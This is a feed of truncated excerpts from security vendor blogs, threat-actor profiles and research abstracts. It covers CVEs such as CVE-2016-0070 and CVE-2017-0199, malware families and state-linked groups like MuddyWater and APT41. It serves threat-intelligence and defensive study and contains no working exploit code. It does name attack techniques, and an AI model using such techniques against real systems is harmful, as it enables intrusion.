Microsoft Kernel Integer Overflow Vulnerability
blogs_fortinet·2016-10-31·CVSS 5.5
CVE-2016-0070 [MEDIUM] Microsoft Kernel Integer Overflow Vulnerability
FORTIGUARD LABS THREAT RESEARCH
Microsoft Kernel Integer Overflow Vulnerability
By Honggang Ren | October 31, 2016
Last month I discovered and reported an integer overflow vulnerability in the Windows Registry. Last Tuesday, October 25th, Microsoft released Security Bulletin MS16-124, which contains the patch for this vulnerability, and identifies it as CVE-2016-0070.
This vulnerability could lead to local privilege elevation, and is rated as “Important” by Microsoft. The vulnerability affects multiple Windows versions, and Microsoft has recommended installing this update immediately.
In this blog I will share the details of this vulnerability.
How to Reproduce
To reproduce the vulnerability, follow the steps below.
Sign into Windows 7 with any non-admin account.
Run regedit.exe in
Fortinet
IBM Rational Collaborative Lifecycle Management XSS Vulnerability
blogs_fortinet·2016-10-17
IBM Rational Collaborative Lifecycle Management XSS Vulnerability
FORTIGUARD LABS THREAT RESEARCH
IBM Rational Collaborative Lifecycle Management XSS Vulnerability
By Honggang Ren | October 17, 2016
At the beginning of this year, I discovered and reported a Cross-Site Scripting (XSS) vulnerability in IBM Rational Collaborative Lifecycle Management (CLM). This month IBM released a security bulletin that contains the fix for this vulnerability.
In this blog, I want to share the details of this vulnerability.
How to Reproduce
To reproduce this vulnerability, you can follow the steps below:
Sign into CLM with a user account, such as “chbest2”, with the permission "JazzAdmins".
Then create a new user account “test123” with the permissions "JazzUsers" and "JazzProjectAdmins", and set the Client Access Licenses. See Figure 1 below.
Figure 1. Create a new
Fortinet
Analysis of OpenSSL Large Message Size Handling Use After Free (CVE-2016-6309)
blogs_fortinet·2016-10-12·CVSS 5.9
CVE-2016-6309 [MEDIUM] Analysis of OpenSSL Large Message Size Handling Use After Free (CVE-2016-6309)
FORTIGUARD LABS THREAT RESEARCH
Analysis of OpenSSL Large Message Size Handling Use After Free (CVE-2016-6309)
By Dehui Yin | October 12, 2016
OpenSSL released an emergency security update shortly after a patch was issued a few weeks ago. This security update addresses a critical Use After Free vulnerability introduced by the updated code that revised to resolve the earlier low severity vulnerability CVE-2016-6307.
This critical Use After Free vulnerability (CVE-2016-6309) is caused by an error that occurs when relocating a message with an overlarge message size greater than 16k. Remote attackers may access the freed buffer to crash, or potentially even execute arbitrary code on vulnerable systems.
This Use After Free vulnerability only affects OpenSSL version 1.1.0a. In this report we
Fortinet
Analysis of Vulnerability CVE-2016-4957 in NTPD
blogs_fortinet·2016-06-20·CVSS 5.3
CVE-2016-4957 [MEDIUM] Analysis of Vulnerability CVE-2016-4957 in NTPD
FORTIGUARD LABS THREAT RESEARCH
Analysis of Vulnerability CVE-2016-4957 in NTPD
By Dehui Yin | June 20, 2016
The Network Time Protocol Daemon (NTPD) by NTP.org, runs on *nix operation systems. It sets and maintains system time in synchronization with internet standard time servers or local reference clocks. NTPD is shipped with many major server operating systems, routers, and infrastructure devices.
CVE-2016-4957 is a high severity vulnerability targeted at the NTPD. It causes a segfault event that causes NTPD to close. If the NTP service stops, it can affect many time-sensitive programs, such as database operations and server groups which need NTP to synchronize time with each other.
The ntp-4.2.8p8 update was released on Jun 02, 2016 to address this vulnerability, along with several
Fortinet
New Fareit Variant Analysis
blogs_fortinet·2016-05-06
New Fareit Variant Analysis
FORTIGUARD LABS THREAT RESEARCH
New Fareit Variant Analysis
By Xiaopeng Zhang | May 06, 2016
Fareit is a family of malware designed to steal confidential information. It has been around for several years, and typically steals system information and application credentials stored on infected systems.
Recently, our FortiGuard Lab captured a new Fareit variant which can be detected as virus Malicious_Behavior.VEX.99. The MD5 of this malware sample is f69a1384fc510aad8770f073bafe512f. In this blog, we want to share our findings about how this Fareit malware variant works.
What Confidential Information Is Collected From Victims?
The malware sample is a PE file. By reversing it, we can find the code which uses a loop to call all functions in a function list. These functions are used to coll
Fortinet
EXD: An attack surface for Microsoft Office
blogs_fortinet·2016-04-01
EXD: An attack surface for Microsoft Office
FORTIGUARD LABS THREAT RESEARCH
EXD: An attack surface for Microsoft Office
By Wayne Chin Yick Low | April 01, 2016
Fortinet has discovered a potential attack surface for Microsoft office via EXD file. After a malformed or specifically crafted EXD file was placed in an expected location, it could trigger a remote code execution when a document with ActiveX is opened with office applications.
Type Library (TypeLib) vs Extender Type Library (EXD)
A type library (described as TypeLib by MSDN) is not uncommon for people who often deal with COM or ActiveX components development as it always associated with these components. As quoted from MSDN, TypeLib are binary files that include information about types and objects exposed by an ActiveX component and typically using TLB as file name exten
Fortinet
Analysis of CVE-2016-0059 - Microsoft IE Information Disclosure Vulnerability Discovered by Fortinet
blogs_fortinet·2016-02-19·CVSS 7.8
CVE-2016-0059 [HIGH] Analysis of CVE-2016-0059 - Microsoft IE Information Disclosure Vulnerability Discovered by Fortinet
FORTIGUARD LABS THREAT RESEARCH
Analysis of CVE-2016-0059 - Microsoft IE Information Disclosure Vulnerability Discovered by Fortinet
By Kai Lu | February 19, 2016
Summary
This month Microsoft patched two vulnerabilities which were discovered and reported by me, one is an information disclosure vulnerability in Internet Explorer (IE) (CVE-2016-0059 in MS16-009), the other is a memory corruption vulnerability in Microsoft Office (CVE-2016-0055 in MS16-015). In this blog, we will provide in-depth analysis of CVE-2016-0059. The vulnerability exists because Microsoft Hyperlink Object Library improperly discloses the contents of its memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user’s system. To exploit the vulnerability,
Fortinet
Apache Commons Collections Under Attack
blogs_fortinet·2016-02-04·CVSS 9.8
CVE-2015-4852 [CRITICAL] Apache Commons Collections Under Attack
FORTIGUARD LABS THREAT RESEARCH
Apache Commons Collections Under Attack
By Dehui Yin | February 04, 2016
Two months ago, a Java zero day vulnerability (CVE-2015-4852) that targeted Apache commons collections library was disclosed. This vulnerability is caused by an error when Java applications, which use Apache commons collections library, deserialize objects from untrusted network sources. Let’s take a look:
Our Fortinet IPS team immediately created a signature, "Apache.Commons.Collection.InvokerTransformer.Code.Execution", in order to protect our customers, and continues to monitor. Over the last 2 months, since creating the initial signature, we have seen it triggered on average, 400 times a day from 50 different FortiGates. This rate of alert is not very high, however, these alerts
Fortinet
CVE-2015-4400 : Backdoorbot, Network Configuration Leak on a Connected Doorbell
blogs_fortinet·2016-01-22·CVSS 4.6
CVE-2015-4400 [MEDIUM] CVE-2015-4400 : Backdoorbot, Network Configuration Leak on a Connected Doorbell
FORTIGUARD LABS THREAT RESEARCH
CVE-2015-4400 : Backdoorbot, Network Configuration Leak on a Connected Doorbell
By Ruchna Nigam | January 22, 2016
Summary
In March 2015, a Network Configuration Leak vulnerability was disclosed to Ring as part of FortiGuard's Responsible Disclosure process.
The vulnerability existed on their first internet-connected doorbell, Doorbot v1.0 but other posts on the subject show that the vulnerability was ported on newer versions of the connected doorbell as well.
The vulnerability had been granted CVE-2015-4400: DoorBot Network Configuration Leak.
We have issued an Advisory and IPS signatures (DoorBot.Network.Configuration.Leak) for the same.
We have not been informed by Ring about any patches issued for the reported vulnerability.
Connected Doorbell?
The
Recorded Future
RedAlpha: New Campaigns Discovered Targeting the Tibetan Community
blogs_recorded_future
RedAlpha: New Campaigns Discovered Targeting the Tibetan Community
# RedAlpha: New Campaigns Discovered Targeting the Tibetan Community
Click here to download the complete analysis as a PDF.
Scope Note: Recorded Future analyzed new malware targeting the Tibetan community. This report includes a detailed analysis of the malware itself and associated infrastructure. Sources include Recorded Future’s platform, VirusTotal, ReversingLabs, and third-party metadata, as well as common OSINT and network metadata enrichments, such as DomainTools Iris and PassiveTotal, and researcher collaboration.1 The impetus of this research is twofold: to provide indicators to leverage for protection for likely victims and to raise awareness of a possible shift in adversary TTPs.
### Executive Summary
Recorded Future’s Insikt Group has identified two new cyberespionage campa
Recorded Future
China Altered Public Data to Conceal MSS Influence | Recorded Future
blogs_recorded_future
China Altered Public Data to Conceal MSS Influence | Recorded Future
## China Altered Public Vulnerability Data to Conceal MSS Influence
## Key Judgements
CNNVD altered the original publication dates in its public database for at least 267 vulnerabilities we identified as statistical outliers in our research published in November 2017.
We assessed in November that CNNVD had a formal vulnerability evaluation process in which high-threat CVEs were evaluated for their operational utility by the MSS before publication, and that the publication lag was one way to identify vulnerabilities that the MSS was likely considering for use in offensive cyber operations. CNNVD’s outright manipulation of these dates implicitly confirmed this assessment.
By retroactively changing the original publication dates on these statistical outliers, CNNVD attempted to hide the e
Threat Intel
MuddyWater (MuddyWater, Earth Vetala, MERCURY)
threat_intel
MuddyWater (MuddyWater, Earth Vetala, MERCURY)
# Threat Actor Profile: MuddyWater
ATT&CK ID: G0069
Also known as: MuddyWater, Earth Vetala, MERCURY, Static Kitten, Seedworm, TEMP.Zagros, Mango Sandstorm, TA450
Suspected origin: Iran
## Overview
MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWate
Threat Intel
TA459 (TA459)
threat_intel·CVSS 7.8
[HIGH] TA459 (TA459)
# Threat Actor Profile: TA459
ATT&CK ID: G0062
Also known as: TA459
Suspected origin: China
## Overview
TA459 is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. (Citation: Proofpoint TA459 April 2017)
## Techniques (TTPs)
### Initial Access
- T1566.001 Spearphishing Attachment
Usage: TA459 has targeted victims using spearphishing emails with malicious Microsoft Word attachments.(Citation: Proofpoint TA459 April 2017)
### Execution
- T1203 Exploitation for Client Execution
Usage: TA459 has exploited Microsoft Word vulnerability CVE-2017-0199 for execution.(Citation: Proofpoint TA459 April 2017)
- T1059.005 Visual Basic
Usage: TA459 has a VBScript for execution.(Citation: Proofpoint TA459 April 2017)
- T1204.002
Threat Intel
Cobalt Group (Cobalt Group, GOLD KINGSWOOD, Cobalt Gang)
threat_intel
Cobalt Group (Cobalt Group, GOLD KINGSWOOD, Cobalt Gang)
# Threat Actor Profile: Cobalt Group
ATT&CK ID: G0080
Also known as: Cobalt Group, GOLD KINGSWOOD, Cobalt Gang, Cobalt Spider
## Overview
Cobalt Group is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. Cobalt Group has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation
Recorded Future
Executive Takeaways From the 2017 Verizon Data Breach Investigation Report (DBIR)
blogs_recorded_future
Executive Takeaways From the 2017 Verizon Data Breach Investigation Report (DBIR)
# Beyond Scanners and NVD: Other Places to Find Useful Vulnerability Intelligence
### Key Takeaways
- Basic vulnerability management starts with using automated vulnerability scanners and relying on public databases like the U.S. National Vulnerability Database (NVD).
- However, those two sources alone can often leave you with insufficient time and information to respond to threats. Data produced by scanners can overwhelm analysts or lull them into a false belief that they have the complete picture, especially since the NVD has been proven to lag behind other sources of information.
- Threat intelligence provides the context needed to understand which vulnerabilities should be prioritized and which can be safely ignored.
- Other more direct sources of information include places like cybe
Threat Intel
APT41 (APT41, Wicked Panda, Brass Typhoon)
threat_intel
APT41 (APT41, Wicked Panda, Brass Typhoon)
# Threat Actor Profile: APT41
ATT&CK ID: G0096
Also known as: APT41, Wicked Panda, Brass Typhoon, BARIUM
Suspected origin: China
## Overview
APT41 is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting various industries, including but not limited to healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries.(Citation: apt41_mandiant) Notable behaviors include using a wide range of malware and tools to complete mission objectives. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 202
Recorded Future
Executive Takeaways From the 2017 Verizon Data Breach Investigation Report (DBIR) | Recorded Future
blogs_recorded_future
Executive Takeaways From the 2017 Verizon Data Breach Investigation Report (DBIR) | Recorded Future
## Beyond Scanners and NVD: Other Places to Find Useful Vulnerability Intelligence
## Key Takeaways
Basic vulnerability management starts with using automated vulnerability scanners and relying on public databases like the U.S. National Vulnerability Database (NVD).
However, those two sources alone can often leave you with insufficient time and information to respond to threats. Data produced by scanners can overwhelm analysts or lull them into a false belief that they have the complete picture, especially since the NVD has been proven to lag behind other sources of information.
Threat intelligence provides the context needed to understand which vulnerabilities should be prioritized and which can be safely ignored.
Other more direct sources of information include places like cybersecu
Threat Intel
Leviathan (Leviathan, MUDCARP, Kryptonite Panda)
threat_intel
Leviathan (Leviathan, MUDCARP, Kryptonite Panda)
# Threat Actor Profile: Leviathan
ATT&CK ID: G0065
Also known as: Leviathan, MUDCARP, Kryptonite Panda, Gadolinium, BRONZE MOHAWK, TEMP.Jumper, APT40, TEMP.Periscope, Gingham Typhoon
Suspected origin: China
## Overview
Leviathan is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.(Citation: CISA AA21-200A APT40 July 2021) Active since at least 2009, Leviathan has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Australia, Europe, the Middle East, and Southeast Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proo
Recorded Future
Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018 | Recorded Future
blogs_recorded_future
Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018 | Recorded Future
## Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018
Click here to download the complete analysis as a PDF.
This analysis focuses on an exploit kit, phishing attack, or remote access trojan co-occurrence with a vulnerability from January 1, 2018 to December 31, 2018. We analyzed thousands of sources, including code repositories, deep web forum postings, and dark web sites. This is a follow-up to our 2017 report , and the intended audience includes information security practitioners, especially those supporting vulnerability risk assessments.
## Executive Summary
Many vulnerability management practitioners face the daunting task of prioritizing vulnerabilities without adequate insight into which vulnerabilities are actively exploited by cybercriminals. Here, we’ll attempt to she
Recorded Future
The Increasing Affordability of Crimeware as a Service | Recorded Future
blogs_recorded_future
The Increasing Affordability of Crimeware as a Service | Recorded Future
## The Increasing Affordability of Crimeware as a Service
## Key Takeaways
Many experienced hackers have shifted from directly attacking targets to creating products to sell to less tech-savvy customers.
This new business model of “crimeware as a service” resembles lawful business practices in many ways. Cybercriminals offer subscription services and competitive pricing, and look for ways to maximize their rate of return. Many focus on quantity over quality, with fewer vulnerabilities exploited more widely.
Threat intelligence becomes useful in identifying which vulnerabilities threat actors are actually targeting. Many threat intelligence vendors have access to privileged spaces, like private marketplaces on the dark web where these products and services are bought and sold, that can
Recorded Future
Microsoft Office Tops the Exploit Charts
blogs_recorded_future·CVSS 7.8
CVE-2017-0199 [HIGH] Microsoft Office Tops the Exploit Charts
# Microsoft Office Tops the Exploit Charts
### Key Takeaways
- Recorded Future research shows that seven of the top 10 vulnerabilities exploited in 2017 targeted Microsoft products.
- At least two of these, CVE-2017-0199 and CVE-2017-0189, were critical vulnerabilities — their exploitation allowed threat actors to arbitrarily execute code or access and change data.
- Despite being aware of at least some of these vulnerabilities for many months, Microsoft did not immediately patch them, leaving users exposed. Patches were not released until after exploits targeting those vulnerabilities appeared for sale on the dark web.
- The pattern and timeline of vulnerability recognition and response shows that proprietors like Microsoft do not always disclose information about existing cybersecurity
Recorded Future
Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018
blogs_recorded_future
Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018
# Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018
Click here to download the complete analysis as a PDF.
This analysis focuses on an exploit kit, phishing attack, or remote access trojan co-occurrence with a vulnerability from January 1, 2018 to December 31, 2018. We analyzed thousands of sources, including code repositories, deep web forum postings, and dark web sites. This is a follow-up to our 2017 report, and the intended audience includes information security practitioners, especially those supporting vulnerability risk assessments.
### Executive Summary
Many vulnerability management practitioners face the daunting task of prioritizing vulnerabilities without adequate insight into which vulnerabilities are actively exploited by cybercriminals. Here, we’ll attempt to shed
Huntress
Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack | Huntress
blogs_huntress·CVSS 7.8
[HIGH] Rapid Response: Microsoft Office RCE - “Follina” MSDT Attack | Huntress
This post, as is the norm for emerging threats, is a developing article and may be subject to change as the Huntress team learns more about this attack vector and new information is available.
UPDATE 4:51pm ET June 14, 2022:
Microsoft announced an available patch for the Follina exploit. Our team has been working to validate the patch, and we have tested and verified that the patch is effective both for Windows 10 and Windows 11:
Just to note, your KB# may vary based on your operating system—check out Microsoft's update for the full list.
Below, the code fails to execute on Windows 10:
In the below image, the raw command fails on Windows 10:
UPDATE 11:16pm ET May 30, 2022:
Microsoft has now revealed the CVE identifier for this vulnerability is CVE-2022-30190, including a Security Up
Recorded Future
China's Influence on National Network Vulnerability Publications | Recorded Future
blogs_recorded_future·CVSS 7.8
[HIGH] China's Influence on National Network Vulnerability Publications | Recorded Future
## China’s Ministry of State Security Likely Influences National Network Vulnerability Publications
## Executive Summary
Earlier research based on the last two years of vulnerability reporting illustrated that China’s National Vulnerability Database of Information Security (CNNVD) was generally more aggressive in capturing up-to-date information for software vulnerabilities than its U.S. counterpart (NVD). In this research we examine exceptions to this general rule and discover a broader role for the Ministry of State Security (MSS) in vulnerability reporting than was previously known.
Recorded Future analysis has uncovered evidence of a formal vulnerability evaluation process at CNNVD in which High-threat CVEs are likely evaluated for their operational utility by the MSS before publica
Crowdstrike
Mustang Panda
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] Mustang Panda
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
Threat Intel
ProCC
threat_intel·CVSS 7.8
CVE-2017-0199 [HIGH] ProCC
# Threat Actor: ProCC
## Description
ProCC is a threat actor targeting the hospitality sector with remote access Trojan malware. They use email attachments to exploit vulnerabilities like CVE-2017-0199 and deploy customized versions of RATs such as RevengeRAT, NjRAT, NanoCoreRAT, and 888 RAT. ProCC's malware is capable of collecting data from the clipboard and printer spooler, as well as capturing screenshots on infected machines.
Recorded Future
Microsoft Office Tops the Exploit Charts | Recorded Future
blogs_recorded_future·CVSS 7.8
CVE-2017-0199 [HIGH] Microsoft Office Tops the Exploit Charts | Recorded Future
## Microsoft Office Tops the Exploit Charts
## Key Takeaways
Recorded Future research shows that seven of the top 10 vulnerabilities exploited in 2017 targeted Microsoft products.
At least two of these, CVE-2017-0199 and CVE-2017-0189, were critical vulnerabilities — their exploitation allowed threat actors to arbitrarily execute code or access and change data.
Despite being aware of at least some of these vulnerabilities for many months, Microsoft did not immediately patch them, leaving users exposed. Patches were not released until after exploits targeting those vulnerabilities appeared for sale on the dark web.
The pattern and timeline of vulnerability recognition and response shows that proprietors like Microsoft do not always disclose information about existing cybersecurity thre
Recorded Future
RedAlpha: New Campaigns Discovered Targeting the Tibetan Community | Recorded Future
blogs_recorded_future
RedAlpha: New Campaigns Discovered Targeting the Tibetan Community | Recorded Future
## RedAlpha: New Campaigns Discovered Targeting the Tibetan Community
Scope Note : Recorded Future analyzed new malware targeting the Tibetan community. This report includes a detailed analysis of the malware itself and associated infrastructure. Sources include Recorded Future’s platform, VirusTotal, ReversingLabs, and third-party metadata, as well as common OSINT and network metadata enrichments, such as DomainTools Iris and PassiveTotal, and researcher collaboration. 1 The impetus of this research is twofold: to provide indicators to leverage for protection for likely victims and to raise awareness of a possible shift in adversary TTPs.
## Executive Summary
Recorded Future’s Insikt Group has identified two new cyberespionage campaigns targeting the Tibetan community over the past two
Threat Intel
Mustang Panda (Mustang Panda, TA416, RedDelta)
threat_intel
Mustang Panda (Mustang Panda, TA416, RedDelta)
# Threat Actor Profile: Mustang Panda
ATT&CK ID: G0129
Also known as: Mustang Panda, TA416, RedDelta, BRONZE PRESIDENT, STATELY TAURUS, FIREANT, CAMARO DRAGON, EARTH PRETA, HIVE0154, TWILL TYPHOON, TANTALUM, LUMINOUS MOTH, UNC6384, TEMP.Hex, Red Lich
Suspected origin: China
## Overview
Mustang Panda is a China-based cyber espionage threat actor that has been conducting operations since at least 2012. Mustang Panda has been known to use tailored phishing lures and decoy documents to deliver malicious payloads. Mustang Panda has targeted government, diplomatic, and non-governmental organizations, including think tanks, religious institutions, and research entities, across the United States, Europe, and Asia, with notable activity in Russia, Mongolia, Myanmar, Pakistan, and Vietnam. (Citatio
Fortinet
FortiGuard Labs Threat Research
blogs_fortinet·CVSS 7.8
[HIGH] FortiGuard Labs Threat Research
FortiGuard Labs Threat Research
Stay connected:
THREAT RESEARCH
DPRK-Related Campaigns with LNK and GitHub C2
Analysis of DPRK-linked LNK-based attacks using GitHub as covert C2 infrastructure, detailing multi-stage PowerShell execution, persistence mechanisms, and data exfiltration techniques targeting Windows environments.
By Cara Lin April 02, 2026
THREAT RESEARCH
Cyber Fallout After the Strikes: Signal, Noise, and What Comes Next
Following U.S.-Israeli strikes on Iran, FortiGuard Labs has not yet observed large-scale cyber retaliation. However, we observed that regional cyber activity is rising. Organizations should take action to strengthen cyber hygiene, rotate credentials, and reduce exposure.
By Aamir Lakhani, Carl Windsor, and Derek Manky March 04, 2026
THREAT RESEARCH
U
Recorded Future
China Altered Public Data to Conceal MSS Influence
blogs_recorded_future
China Altered Public Data to Conceal MSS Influence
# China Altered Public Vulnerability Data to Conceal MSS Influence
Click here to download the complete analysis as a PDF and view the raw CNNVD data set here.
### Key Judgements
- CNNVD altered the original publication dates in its public database for at least 267 vulnerabilities we identified as statistical outliers in our research published in November 2017.
- We assessed in November that CNNVD had a formal vulnerability evaluation process in which high-threat CVEs were evaluated for their operational utility by the MSS before publication, and that the publication lag was one way to identify vulnerabilities that the MSS was likely considering for use in offensive cyber operations. CNNVD’s outright manipulation of these dates implicitly confirmed this assessment.
- By retroactively cha
Threat Intel
BlackTech (BlackTech, Palmerworm)
threat_intel·CVSS 9.8
[CRITICAL] BlackTech (BlackTech, Palmerworm)
# Threat Actor Profile: BlackTech
ATT&CK ID: G0098
Also known as: BlackTech, Palmerworm
Suspected origin: China
## Overview
BlackTech is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. BlackTech has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.(Citation: TrendMicro BlackTech June 2017)(Citation: Symantec Palmerworm Sep 2020)(Citation: Reuters Taiwan BlackTech August 2020)
## Techniques (TTPs)
### Resource Development
- T1588.003 Code Signing Certificates
Usage: BlackTech has used stolen code-signing certificates for its malicious pay
Recorded Future
The Increasing Affordability of Crimeware as a Service
blogs_recorded_future
The Increasing Affordability of Crimeware as a Service
# The Increasing Affordability of Crimeware as a Service
### Key Takeaways
- Many experienced hackers have shifted from directly attacking targets to creating products to sell to less tech-savvy customers.
- This new business model of “crimeware as a service” resembles lawful business practices in many ways. Cybercriminals offer subscription services and competitive pricing, and look for ways to maximize their rate of return. Many focus on quantity over quality, with fewer vulnerabilities exploited more widely.
- Threat intelligence becomes useful in identifying which vulnerabilities threat actors are actually targeting. Many threat intelligence vendors have access to privileged spaces, like private marketplaces on the dark web where these products and services are bought and sold, that
Threat Intel
APT37 (APT37, InkySquid, ScarCruft)
threat_intel
APT37 (APT37, InkySquid, ScarCruft)
# Threat Actor Profile: APT37
ATT&CK ID: G0067
Also known as: APT37, InkySquid, ScarCruft, Reaper, Group123, TEMP.Reaper, Ricochet Chollima
Suspected origin: China
## Overview
APT37 is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. APT37 has also been linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018.(Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft Jun 2016)(Citation: Talos Group123)
North Korean group definitions are
Huntress
CVE-2017-0199 Vulnerability: Analysis, Impact, Mitigation | Huntress
blogs_huntress·CVSS 7.8
CVE-2017-0199 [HIGH] CVE-2017-0199 Vulnerability: Analysis, Impact, Mitigation | Huntress
## CVE-2017-0199 Vulnerability
Published: 12/05/2025
Written by: Lizzie Danielson
## What is CVE-2017-0199 vulnerability?
CVE-2017-0199 is a Remote Code Execution (RCE) vulnerability in Microsoft Office and WordPad. It arises through the improper handling of Object Linking and Embedding (OLE) objects, enabling attackers to execute arbitrary code by sending a maliciously crafted document or RTF (Rich Text Format) file. Exploiting this vulnerability can grant attackers the ability to compromise systems, steal sensitive data, or perform lateral movement across networks.
## When was it discovered?
CVE-2017-0199 was first disclosed on April 11, 2017, with a formal security update released by Microsoft on the same day. Security researchers discovered the vulnerability after observing targe
Threat Intel
Patchwork (Patchwork, Hangover Group, Dropping Elephant)
threat_intel
Patchwork (Patchwork, Hangover Group, Dropping Elephant)
# Threat Actor Profile: Patchwork
ATT&CK ID: G0040
Also known as: Patchwork, Hangover Group, Dropping Elephant, Chinastrats, MONSOON, Operation Hangover
Suspected origin: China
## Overview
Patchwork is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. Patchwork has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Cita
Zscaler
Zscaler protects against 16 new vulnerabilities for MS
blogs_zscaler·CVSS 7.8
[HIGH] Zscaler protects against 16 new vulnerabilities for MS
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Recorded Future
China's Influence on National Network Vulnerability Publications
blogs_recorded_future·CVSS 7.8
[HIGH] China's Influence on National Network Vulnerability Publications
# China’s Ministry of State Security Likely Influences National Network Vulnerability Publications
Click here to download the complete analysis as a PDF.
### Executive Summary
Earlier research based on the last two years of vulnerability reporting illustrated that China’s National Vulnerability Database of Information Security (CNNVD) was generally more aggressive in capturing up-to-date information for software vulnerabilities than its U.S. counterpart (NVD). In this research we examine exceptions to this general rule and discover a broader role for the Ministry of State Security (MSS) in vulnerability reporting than was previously known.
Recorded Future analysis has uncovered evidence of a formal vulnerability evaluation process at CNNVD in which High-threat CVEs are likely evaluated
arXiv
KillChainGraph: ML Framework for Predicting and Mapping ATT&CK Techniques
arxiv_fulltext·2025-08-19
KillChainGraph: ML Framework for Predicting and Mapping ATT&CK Techniques
KillChainGraph: ML Framework for Predicting and Mapping ATT&CK Techniques
Chitraksh Singh\,0009-0000-1020-8989
Frondeur Labs
Mumbai, Maharashtra, INDIA
[email protected]
Monisha Dhanraj\, 0009-0009-8593-1632
Frondeur Labs
Bengaluru, Karnataka, INDIA
[email protected]
Ken Huang\, 0009-0004-6502-3673
DistributedApps.ai, OWASP
Fairfax, VA, USA
[email protected]
## Abstract
The escalating complexity and volume of cyberattacks demand proactive detection strategies that go beyond traditional rule-based systems. This paper presents a phase-aware, multi-model machine learning framework that emulates adversarial behavior across the seven phases of the Cyber Kill Chain using the MITRE ATT&CK Enterprise dataset. Techniques are semantically mapped to phases via A
arXiv
CLIProv: A Contrastive Log-to-Intelligence Multimodal Approach for Threat Detection and Provenance Analysis
arxiv_fulltext·2025-07-12
CLIProv: A Contrastive Log-to-Intelligence Multimodal Approach for Threat Detection and Provenance Analysis
1
.001
[mode = title]CLIProv: A Contrastive Log-to-Intelligence Multimodal Approach for Threat Detection and Provenance Analysis
[1].
[1]Jingwen Li[style=chinese]
Conceptualization, Methodology, Writing–original draft
[1]organization=Beijing University of Posts and Telecommunications,
city=Beijing,
postcode=100876,
country=China
[1]Ru Zhang[style=chinese, orcid=0000-0001-6641-3236]
[1]
[email protected]
Supervision, Writing-Review & Editing
[1]Jianyi Liu[style=chinese]
Methodology, Writing-Review & Editing, Resources
[2]WanGuo Zhao[style=chinese]
Data curation, Resources
[2]organization=Beijing Anheng Xin'an Technology Co., Ltd,
city=Beijing,
postcode=100089,
country=China
[1]Corresponding author
